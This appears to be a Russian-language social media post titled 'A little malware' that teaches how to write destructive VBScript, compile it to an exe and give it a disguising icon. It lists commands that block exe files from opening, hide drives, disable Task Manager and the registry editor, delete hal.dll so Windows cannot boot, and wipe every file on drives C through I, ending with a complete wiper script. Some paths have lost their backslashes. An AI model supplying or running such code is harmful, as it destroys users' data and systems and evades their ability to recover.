Немного вредоносов
@darkrulesВредоносную программу будем писать на языке Visual Basic Script (VBS).
Затем скомпилируем в исполняемый файл (exe).
Итак, приступим:
Создаём текстовый документ,содержащий следующее:
on error resume next
Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
s.run"rundll32 user32, SwapMouseButton"
Затем, сохранив полученные данные, изменяем расширение файла на ".vbs".
Вот у нас и готов первый вредонос, меняющий местами кнопки мыши.
Теперь нужно его скомпилировать в exe формат с помощью программы: "Vbs2Exe", и установить любой значок с помощью грабера иконок: "IconToy".
А теперь информация для тех, кто не намерен ограничивать свои возможности банальным обменом кнопок мыши.
on error resume next
Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
Три, верхние строчки - должны присутствовать всегда. Далее,
следует кодировка, а ниже, в скобках - пояснение.
Так же возможно сочетать, те или иные вредоносные команды.
s.regwrite"HKCRexefileshellopencommand","rundll32.exe"
(Запрет на открытие "EXE" файлов)
s.regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDrives","67108863","REG_DWORD"
s.regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoViewOnDrive","67108863","REG_DWORD"
(запрет доступа к жёстким дискам)
fso.deletefile fso.getspecialfolder(0)+"system32hal.dll",1
(удаляется системный фаил, после чего загрузка Windows становится невозможна.
Система работает до первой перезагрузки)
fso.deletefolder fso.getspecialfolder(0)+"system32drives",1
fso.deletefolder fso.getspecialfolder(0)+"Driver Cache"
(удаление драйверов)
fso.deletefolder "АДРЕС",1
(Удаление папки. Пример: fso.deletefolder "C:Новая папка",1)
fso.deletefolder "C:*.*",1
(Удаление всех папок диска С. Адрес можно поставить любой)
fso.deletefile "АДРЕС",1
(Удаление файла. Пример: fso.deletefile "C:Новая папкаТекстовый документ.txt",1)
fso.deletefile "C:*.*",1
(Удаление всех файлов диска С. Адрес можно поставить любой)
s.regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemdisableregistrytools","1","REG_DWORD"
(Запрет редактирования реестра)
s.regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemdisabletaskmgr","1","REG_DWORD"
(Запрет диспетчера задач)
s.run"rundll32 user32, SwapMouseButton"
(Обмен кнопок мыши)
Пример:
on error resume next
Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
fso.deletefile "C:*.*",1
fso.deletefolder "C:*.*",1
fso.deletefile "D:*.*",1
fso.deletefolder "D:*.*",1
fso.deletefile "E:*.*",1
fso.deletefolder "E:*.*",1
fso.deletefile "F:*.*",1
fso.deletefolder "F:*.*",1
fso.deletefile "G:*.*",1
fso.deletefolder "G:*.*",1
fso.deletefile "H:*.*",1
fso.deletefolder "H:*.*",1
fso.deletefile "I:*.*",1
fso.deletefolder "I:*.*",1
fso.deletefile fso.getspecialfolder(0)+"system32hal.dll",1